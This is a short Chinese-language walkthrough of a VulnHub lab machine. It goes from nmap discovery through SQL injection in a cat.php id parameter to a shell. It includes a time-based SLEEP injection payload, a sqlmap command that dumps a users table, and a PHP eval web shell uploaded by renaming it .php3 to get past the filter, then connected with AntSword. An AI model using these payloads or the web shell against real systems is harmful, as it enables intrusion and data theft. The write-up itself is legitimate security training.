vulnhub靶场From SQL injection to Shell

一、概括通过基础潘顿和推测网页存在sql注入漏洞验证存在漏洞利用sql注入获得数据库中敏感数据登录到网页管理员页面发现存在文件上传漏洞利用文件上传漏洞获取服务器的信息二、通关过程nmap获得靶机访问地址通过靶机的mac地址和探测结果得出靶机IP地址浏览器访问地址首页没有发现什么明显内容访问其它网页发现存在特殊参数id五i测存在sql漏洞这里还发现了登录页面sqlmap探测漏洞sqlmap-uhttp://192.168.8.155/cat.php?id1--batch验真是否存在id2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)页面存在明显的延迟那就是探测无误存在sql注入获取数据sqlmap -u http://192.168.8.155/cat.php?id1 -D photoblog -T users --dump获得用户名密码登录后台查看信息页面存在文件上传推测存在漏洞创建一个文件试试看写入?php eval($_POST[cmd]);?直接上传发现提示无法上传php文件那试试php3等文件后缀通过访问本页面的其它图片判断图片存放位置蚁剑连接测试连接成功访问其它文件即可